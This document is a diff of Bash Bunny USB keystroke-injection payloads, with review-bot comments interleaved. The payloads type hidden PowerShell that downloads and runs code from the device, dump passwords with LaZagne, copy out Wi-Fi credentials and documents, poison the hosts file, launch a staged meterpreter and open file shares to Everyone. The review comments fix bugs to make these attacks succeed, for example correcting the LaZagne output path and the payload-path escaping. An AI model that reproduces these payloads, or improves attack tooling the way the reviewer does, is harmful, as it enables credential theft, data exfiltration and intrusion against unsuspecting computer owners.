RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
# TIP: Remove tracks in the psh payload if you wish
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
# Remove tracks in the psh payload if you wish
# STAGE 2 - Wait until payload retrieved
# Wait until payload is retrieved
# STAGE 2 - HURRY UP AND WAIT
LED STAGE2
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
# CLEANUP
LED CLEANUP
# Move loot to mass storage
mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
rm /loot/${LOGFILE}
# STASH THE LOOT
mv /tmp/l/* ${LOOTDIR_BB}/
rm -rf /tmp/{l,p}
# Sync file system
sync
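Review bot: The share `s` is now rooted at `/tmp` and the server log is `LOGFILE=/tmp/l/psh_downloadsmb.log`, i.e. inside the writable share, so the log (and everything else under `/tmp`) is readable and replaceable from the target side over SMB before it is moved to `${LOOTDIR_BB}`. Root the share in a directory created with `mktemp -d` that holds only `p/` and `l/`, and keep the log outside the share, collecting it at cleanup. Also, `COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)` parses `ls` output and prints an error on the first run when no directory matches; a glob-based count or `find … -maxdepth 1 | wc -l` avoids that. The `tcpclient(${HOST_IP},445)` argument in the `RUN WIN` line is unquoted, whereas the HTTP variant in this commit quotes it as `('${HOST_IP}','80')`; worth confirming PowerShell accepts a bare dotted address in that position.
```shell
SHARE_DIR=$(mktemp -d)                    # share root: only p/ and l/, not all of /tmp
mkdir -p "${SHARE_DIR}"/{l,p}
# … unchanged: p.txt check (LED FAIL / exit 1) …
cp -R "${PAYLOAD_DIR}"/* "${SHARE_DIR}"/p/   # any additional assets will be available in the share
# … unchanged: hostname / COUNT / LOOTDIR_BB setup …
LOGFILE=/tmp/psh_downloadsmb.log          # outside the share: not readable or replaceable over SMB
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s "${SHARE_DIR}" > "${LOGFILE}" &
# … unchanged: LED STAGE1 / RUN WIN … / LED STAGE2 …
while ! [ -f "${SHARE_DIR}"/COMPLETE ]; do sleep 0.5; done
# … unchanged: LED CLEANUP …
mv "${SHARE_DIR}"/l/* "${LOGFILE}" "${LOOTDIR_BB}"/
rm -rf "${SHARE_DIR}"
```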


@ -10,16 +10,20 @@
## Description
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.
## Configuration
* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
* Requires Impacket is installed (python ./impacket/setup.py install)
* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
* Requires Impacket
__Installation__
See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
## STATUS
| Attack Stage | Description |
| ------------------- | ------------------------------|
| Stage 1 | Powershell |
| Stage 2 | Delivering powershell payload |
| Stage 2 | Delivering powershell payload |


@ -2,7 +2,7 @@
# Author: JWHeuver & JBaselier
# Version: 1.0
#
# Runs powershell script to get Wlan and logon credentials
# Runs powershell script to get Wlan and logon credentials
# from computer and save them on USB drive (Storage attack)
#
# Purple.............Loading
@ -14,19 +14,18 @@
# OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no
# Source bunny_helpers.sh to get environment variable and switch_positions
source bunny_helpers.sh
#-----------------------------------
# Purple LED - initializing
LED R B 0
LED SETUP
GET SWITCH_POSITION
# Attackmode HID / Storage
ATTACKMODE HID STORAGE
#-----------------------------------
# Green LED - executing credential_powershell
LED G 0
LED STAGE1
QUACK GUI r
QUACK DELAY 300
@ -57,4 +56,4 @@ QUACK ENTER
#-----------------------------------
# Kill the lights - finished
LED 0
LED FINISH


@ -11,49 +11,40 @@
# Purple LED..................Script Started
# Yellow LED..................Ducky Script Started
# Red LED.....................Failed to run Ducky Script, see log file
#
#
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
#
LED B R
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
# Set language
QUACK SET_LANGUAGE gb
# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
#Call ducky script
LED R G
#Call ducky script
LED STAGE1
QUACK ${SWITCH_POSITION}/ducky_script.txt
QUACK DELAY 10000
LED R G B
LED FINISH
else
LED R
LED FAIL
#Red LED if unable to load script
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1


@ -4,18 +4,18 @@
# Author: $irLurk$alot
# Version: 1.0
# Target: Windows
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn runs powershell script to copy move and extract data.
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED SETUP
GET SWITCH_POSITION
LED R 100
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
LED R B 100
LED ATTACK
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED R G B
LED FINISH


@ -4,7 +4,7 @@
# Author: Nutt
# Version: 1.0
# Target: Windows
#
#
#Exfiltrates files from the users Documents folder
#FTP's all files/folders to a specified FTP site named by the victim hostname.
#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
@ -15,13 +15,12 @@
#Red............Failed - Need to work on
#Green..........Finished
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R B
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 1000
LED ATTACK
QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
QUACK ENTER
LED G
LED FINISH


@ -6,6 +6,14 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
@ -19,11 +27,12 @@ REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit
@exit
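Review bot: The added `%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\…_passwords.txt"` line redirects into `loot\USB_Exfiltration\` before `mkdir %dst%` runs, so unless that directory already exists on the disk the redirect fails and no output file is written. Move the `laZagne.exe` line below `mkdir %dst% >>nul`, or create the parent first with `mkdir "%~dp0\..\..\loot\USB_Exfiltration" 2>nul`. The comment `REM %~d0 = path to this batch file` names `%~d0` while the code uses `%~dp0`; fix the comment. `%~dp0` already ends in a backslash, so `%~dp0\laZagne.exe` yields a doubled separator; `%~dp0laZagne.exe` is the conventional form.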


@ -6,12 +6,12 @@
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
#
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"


@ -4,22 +4,19 @@
# Author: IMcPwn
# Version: 1.0
# Target: Windows 7+
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
# Green LED for finished
LED G
LED FINISH


@ -19,10 +19,12 @@ LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
ATTACKMODE HID STORAGE
#Import Bunny Helpers
source bunny_helpers.sh
#Start of Script
LED SETUP
GET SWITCH_POSITION
LED ATTACK
#Start of Script
Q DELAY 6000
Q GUI r
Q DELAY 100
@ -39,6 +41,7 @@ Q STRING cd \$absPath
Q ENTER
Q DELAY 500
LED ATTACK
#Set the proxy in the internet settings in the registry (For IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
Q ENTER
@ -62,4 +65,4 @@ Q DELAY 500
Q STRING EXIT
Q ENTER
sync
LED R B 100
LED FINISH
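Review bot: `LED ATTACK` is set twice on the new side, once right after `GET SWITCH_POSITION` in the first hunk and again as the single addition in the second hunk just before the `SetProxy.ps1` line, so the first one conveys nothing distinct from setup. Make the first a stage indicator, `LED STAGE1`, or drop it so the transition to `LED ATTACK` marks the actual registry change. The `Q STRING powershell … $SWITCH_POSITION …` line still uses the unbraced form; `${SWITCH_POSITION}` matches the other payloads in this commit.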


@ -23,7 +23,7 @@
# Sharing is caring
# Right-Click Ineternet interface click on
# "Properties" and select "Sharing" tab
#
#
# From "Sharing" tab check
# "Allow other netwrk usrs 2 connect... thru dis connection"
# Select the Bash Bunny Gadget and hit "OK"
@ -34,9 +34,11 @@
# Set the IPv4=172.16.64.64 and Subnet=24-bit
# Hit all the OKs
GET SWITCH_POSITION
# Or we could just have the Bash Bunny do all the work...
LED SETUP
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)
# HID Attack Starts
ATTACKMODE HID
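Review bot: The new `SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)` uses command substitution, not parameter expansion: bash will try to run a command named `SWITCH_POSITION`, fail, and leave `SWITCHDIR=/root/udisk/payloads/`, so every later use of `SWITCHDIR` points at the payloads root. The removed line had it right; the new one should be `SWITCHDIR=/root/udisk/payloads/${SWITCH_POSITION}`.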


@ -0,0 +1,9 @@
# DNS Poisoning Attack Mac
## Description
Redirects a domain to a set IP adres by changing the hosts file.
## Configuration
Change the domain you want to redirect and the IP you want to direct it to.


@ -0,0 +1,23 @@
#Title: DNS Poisoning Mac
#Description: Attacks the host file to redirect a website of your chosing for a given domain
#Author: thehappydinoa
#Target: OS X
LED R 200
ATTACKMODE HID
LED STAGE1
Q DELAY 400
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 200
Q ENTER
Q DELAY 400
Q STRING 'echo 10.1.1.0 test.com>>/etc/hosts'
Q DELAY 50
Q ENTER
Q STRING exit
Q ENTER
LED FINISH
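Review bot: `echo 10.1.1.0 test.com>>/etc/hosts` is typed into an ordinary Terminal session, but /etc/hosts is root-owned on macOS, so the redirection fails with "Permission denied" for a non-admin user and the payload still ends on `LED FINISH` as if it had worked. The write needs elevation (e.g. `sudo sh -c 'echo 10.1.1.0 test.com >> /etc/hosts'`), which in turn means a password prompt the HID stream cannot answer unless the target has passwordless sudo, so the header should state that prerequisite (`#Requires: admin session with sudo`), and `10.1.1.0` is a network address in a /24 rather than a usable host — pick a real host IP for the example. macOS may also keep the old answer cached until `dscacheutil -flushcache` (and typically a `killall -HUP mDNSResponder`) is run, which is worth a line in the README.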


@ -1,34 +1,37 @@
#!/bin/bash
#
# Title: RickRoll Prank
# Author: illwill
# Version: 0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull
LED B 200
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER
ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED R G B 200
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED G 200
kill -9 $pid
exit
#!/bin/bash
#
# Title: RickRoll Prank
# Author: illwill
# Version: 0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull
LED SETUP
GET SWITCH_POSITION
LED STAGE1
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER
LED STAGE2
ATTACKMODE RNDIS_ETHERNET
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED ATTACK
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED FINISH
kill -9 $pid
exit
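Review bot: `cd $payload_dir` is unquoted and unchecked; if it fails (bad switch position, udisk not mounted yet), the `python -m SimpleHTTPServer 80` that follows serves whatever directory the payload was started from, exposing far more than RR.ps1 to the RNDIS side. Change it to `cd "$payload_dir" || { LED FAIL; exit 1; }`. The `while ! nc -z localhost 80` loop is also unbounded, so a failed bind (something already on :80, or python absent) leaves the payload spinning on `LED STAGE2` forever; a bounded retry that falls through to `LED FAIL` would make the state visible to the operator.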


@ -1,25 +1,26 @@
pid=$$
touch /tmp/$pid
cd /tmp/
for (( i=0; i < 5; ++i ))
do
if [ ! -e /tmp/1.jpg ]; then
wget "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg" -O "/tmp/1.jpg";
curl -0 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg";
fi
if [ ! -e /tmp/2.jpg ]; then
wget "http://wallpapersafari.com/download/rzbCmJ/" -O "/tmp/2.jpg";
curl -0 2.jpg "http://wallpapersafari.com/download/rzbCmJ/";
fi
if [ ! -e /tmp/3.jpg ]; then
wget "https://images3.alphacoders.com/152/152507.jpg" -O "/tmp/3.jpg";
curl -0 3.jpg "https://images3.alphacoders.com/152/152507.jpg";
fi
if [ ! -e /tmp/4.jpg ]; then
wget "https://images3.alphacoders.com/152/152475.jpg" -O "/tmp/4.jpg";
curl -0 4.jpg "https://images3.alphacoders.com/152/152475.jpg";
fi
if [ ! -e /tmp/5.jpg ]; then
wget "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png" -O "/tmp/5.jpg";
curl -0 5.jpg "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png";
fi
let number="$RANDOM % 5 + 1 | bc"
@ -31,7 +32,7 @@ do
killall Dock
let time="$RANDOM % 18000 + 2700 | bc"
echo $time
sleep $time
sleep $time
done
rm /tmp/1.jpg /tmp/2.jpg /tmp/3.jpg /tmp/4.jpg /tmp/5.jpg /tmp/$pid
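Review bot: `curl -0 1.jpg "URL"` does not write a file: `-0` is `--http1.0`, so curl tries to fetch `1.jpg` as a URL, fails, and streams the real image to stdout; `/tmp/1.jpg` is never created and the `[ ! -e /tmp/1.jpg ]` guard re-downloads on every iteration. The `wget ... -O` replacement intended by #271 is `curl -fsSL -o /tmp/1.jpg "URL"` (likewise for 2–5); `-f` matters because without it an HTTP error page would be saved under the image name and then satisfy the `-e` check, and `-L` follows any redirect these wallpaper hosts may send. The `cd /tmp/` above makes the relative name work, but the explicit /tmp path keeps the download and the existence check visibly the same file.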


@ -78,7 +78,6 @@ if [ "$OS" = "MAC" ]; then
RUN OSX "terminal"
QUACK STRING "open \"http://www.windows93.net\" && osascript -e \"sleep 3;ccf;\";"
elif [ "$OS" = "LINUX" ]; then
DUCKY_LANG fr
RUN UNITY "xterm"
QUACK STRING "chromium-browser --start-fullscreen --incognito --new-window http://www.windows93.net &; exit;"
QUACK ENTER


@ -5,39 +5,19 @@
# Version: 1.0
# Target: Windows
# Creds: Hak5Darren for inspiration
#
#
# Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Check swith copied from bunny_helper
check_switch() {
switch1=`cat /sys/class/gpio_sw/PA8/data`
switch2=`cat /sys/class/gpio_sw/PL4/data`
switch3=`cat /sys/class/gpio_sw/PL3/data`
if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch1"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch2"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
SWITCH_POSITION="switch3"
else
SWITCH_POSITION="invalid"
fi
}
check_switch
# Set your language here
QUACK SET_LANGUAGE no
LED ATTACK
QUACK GUI r
QUACK DELAY 200
# Open run and run the run.ps1 script in the Bashbunny
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
QUACK ENTER
LED G
#Green means good to go
LED FINISH
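Review bot: The PowerShell one-liner resolves the drive with `gwmi win32_volume -f 'label=''BashBunny'''` only `QUACK DELAY 200` after `GUI r`, with no wait after `ATTACKMODE HID STORAGE` for the mass-storage volume to enumerate; if it is not mounted yet `.Name` is null, the path to run.ps1 is wrong, nothing runs, and the payload still ends on `LED FINISH`. The PrivEscChecker payload in this same commit waits (`Q DELAY 6000` with the comment "wait 6 seconds for the storage to popup"); add a comparable `QUACK DELAY 5000` right after `ATTACKMODE HID STORAGE` here. I cannot tell from the hunk whether run.ps1 itself reports failure, so the LED is presumably the only signal the operator gets.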


@ -1,12 +0,0 @@
LED R B 100
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go


@ -1,12 +1,7 @@
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
DUCKY_LANG gb
LED B
LED ATTACK
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED FINISH
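Review bot: Removing `DUCKY_LANG gb` leaves this payload with no keyboard-layout selection, so the Bunny presumably types with its default layout while the removed line shows the payload was written for a GB target; `"` and `@` sit on different keys in the US and UK layouts, so the double-quoted PowerShell argument typed by `RUN WIN` comes out garbled on a UK-layout host. The info-wifi payload in this same commit uses `QUACK SET_LANGUAGE no` as the 1.2+ replacement; add `QUACK SET_LANGUAGE gb` after `ATTACKMODE HID STORAGE` here, or document in a header comment that the payload is now US-layout only.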


@ -15,10 +15,8 @@
# Green..............Found Possible Privilege Escalation
# Red................No Possible Privilege Escalation
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R 200
LED SETUP
GET SWITCH_POSITION
LOOTDIR=/root/udisk/loot/PrivEscChecker
mkdir -p $LOOTDIR
#cleanup any prior unfinished payloads
@ -26,7 +24,7 @@ rm $LOOTDIR/DONE
rm $LOOTDIR/OUTPUT
ATTACKMODE HID STORAGE
LED B 200
LED ATTACK
# wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
Q DELAY 6000
@ -57,7 +55,7 @@ Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \
Q ENTER
Q DELAY 100
# Eject the USB Safely
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
@ -68,7 +66,7 @@ Q ENTER
sync
#remount the drive and check results
LED R B 200
LED CLEANUP
sleep 1
# Wait for the DONE file to be created so we know powershell is finished
LOOTDIR=/root/udisk/loot/PrivEscChecker
@ -84,7 +82,7 @@ rm -f $DONEFILE
# Check OUTPUT.txt for any missing patches
if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
LED G 200
else
LED R
fi
LED FINISH
else
LED FAIL
fi
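Review bot: The result branch now ends in `LED FAIL` when `grep` finds no "Appears Vulnerable" line, but the header comments describe that outcome as a result ("Red: No Possible Privilege Escalation"), not a failure; elsewhere in this commit `LED FAIL` marks genuine errors (e.g. the meterpreter payload's missing-script branch), so an operator can no longer tell a clean host from a broken run. Keep a distinct pattern for the negative result, e.g. the `LED R` the old code used, and reserve `LED FAIL` for error paths. Also `grep -lq` mixes the list-filenames flag with quiet mode; `grep -q 'Appears Vulnerable' "$LOOTDIR/$DIR/OUTPUT.txt"` is what is meant, with the path quoted. The DONE-file wait that precedes this check is outside the hunk.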


@ -17,6 +17,9 @@ RPORT=4444
# Start Setup
LED SETUP
# Gets Switch Position
GET SWITCH_POSITION
# Set Attack Mode
ATTACKMODE HID STORAGE


@ -4,18 +4,18 @@
# Author: StinkyBliss
# Version: 1.0
# Target: Windows
#
#
#
#
# Maps the file system and stores it in c:\users\tempa
# Shares a location to everyone and grants full security permissions to everyone
#
#
# For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
# To share a drive change the path in nl.cmd to c: remove the quotes
LED R 200
LED SETUP
GET SWITCH_POSITION
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED STAGE1
ATTACKMODE HID
@ -30,12 +30,12 @@ Q DELAY 1000
Q LEFT
Q ENTER
LED R G 200
LED STAGE2
ATTACKMODE HID STORAGE
# Start nl.cmd
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')"
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')"
Q ENTER
# Wait for nl.cmd and exit
@ -45,4 +45,4 @@ Q ENTER
sync
LED G
LED FINISH
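Review bot: `'payloads\${SWITCH_POSITION}\nl.cmd'` sits inside a double-quoted bash string, where `\$` is the escape for a literal dollar sign: the Bunny types `payloads${SWITCH_POSITION}\nl.cmd` (backslash consumed, variable never expanded), and because that lands inside PowerShell single quotes PowerShell will not expand it either, so the hard-coded `switch1` has been replaced with a path that never resolves. Use the form the other payloads in this commit use, `Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\nl.cmd')"`, where `\\` yields one backslash and `$SWITCH_POSITION` expands before typing. `GET SWITCH_POSITION` at the top of the hunk does run before this line, so the variable is populated once the quoting is fixed.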


@ -17,12 +17,13 @@
#Green - Attack Completion
#Initialization - Setting AttackModes
LED W
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Initialization Completed
#Beginning of HID/STORAGE Phase
LED B 10
LED ATTACK
#Description::
Q DELAY 2000
Q GUI d
@ -61,7 +62,7 @@ Q DELAY 500
#End of HID/STORAGE Phase
#Cleanup
LED Y 100
LED CLEANUP
#Clears complete run history
Q GUI r
Q DELAY 500
@ -70,7 +71,6 @@ Q ENTER
#End of Cleanup
#Completion of script
LED G 100
sync
LED G
LED FINISH
#Completed


@ -3,7 +3,6 @@ LED G
REM set attackmode to HID device
ATTACKMODE HID
REM set keyboard
DUCKY_LANG us
REM open run menu
Q GUI r
Q DELAY 1000


@ -29,20 +29,19 @@
# Red: failure to load dependency ducky script
#
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID
LED R G 200
LANGUAGE='us'
source bunny_helpers.sh
LED ATTACK
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
LED G
LED FINISH
else
LED R
LED FAIL
echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
exit 1
fi
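Review bot: The guard tests `/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt` but the next line quacks `${SWITCH_POSITION}/windows-staged-meterpreter.txt`, so the check can pass while the script actually run is missing (or fail while it is present), and the error message then names `dwindows-staged-meterpreter.txt`. Check the same file you execute, `if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/windows-staged-meterpreter.txt" ]; then`, pass that same absolute path to `QUACK` unless QUACK is known to resolve relative names against the payloads directory, and fix the message to `Unable to load windows-staged-meterpreter.txt`. `LANGUAGE='us'` is still assigned but nothing in the hunk reads it now that `bunny_helpers.sh` is gone; if it was only consumed there, drop it or replace it with `QUACK SET_LANGUAGE us` as the info-wifi payload in this commit does.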


@ -6,7 +6,7 @@
# Version: 1.0
# Target: Windows 7+
# NOTICE: HAK5 is not responsible for the execution of 3rd party binaries!
#
#
# Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd.
# e.cmd is excuted invisibly using i.vbs
# which in turn copies psftp.exe from the root of the Bash Bunny and then executes it
@ -16,16 +16,15 @@
# SET lootfrom=c:\users\username\documents
# SET looto=/loot
#
#IMPORTANT:
#IMPORTANT:
#To Download psftp.exe please use one of the links below:
#32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe
#64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe
#Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
@ -33,4 +32,4 @@ QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'pa
QUACK ENTER
# Green LED for finished
LED G
LED FINISH